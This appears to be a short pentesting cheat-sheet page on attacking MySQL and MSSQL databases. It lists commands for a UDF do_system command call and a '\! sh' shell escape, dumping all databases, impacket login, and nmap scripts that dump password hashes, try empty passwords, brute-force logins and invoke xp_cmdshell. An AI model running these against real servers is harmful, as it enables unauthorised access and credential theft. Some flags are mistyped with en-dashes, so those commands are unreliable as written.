MYSQL

Default Port = 3306

MySQL Commands : http://g2pc1.bu.edu/~qzpeng/manual/MySQL%20Commands.htm


========================running as root and you have access : 
>>> mysql> select do_system('id');
>>> mysql> \! sh


=======================connecting to mssql:
>>>python3 /opt/impacket/examples/mssqlclient.py Username@$IP -windows-auth


========================Getting all the information from inside the database : 
>>> mysqldump -u admin -p admin --all-databases --skip-lock-tables 


========================Nmap Scripts : 
>>> nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $IP
>>> nmap -n -v -sV -Pn -p 1433 –script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password $IP
>>> nmap -n -v -sV -Pn -p 1433 –script ms-sql-brute –script-args userdb=users.txt,passdb=passwords.txt $IP
>>> nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $IP -p 3306
>>> nmap -sV -Pn -vv -script=mysql* $ip -p 3306


========================Username Enumearation : 
>>> nmap –script=mysql-enum –script-args userdb=<username lists> $IP

PreviousSQLNextMy-SQL Root Access

Last updated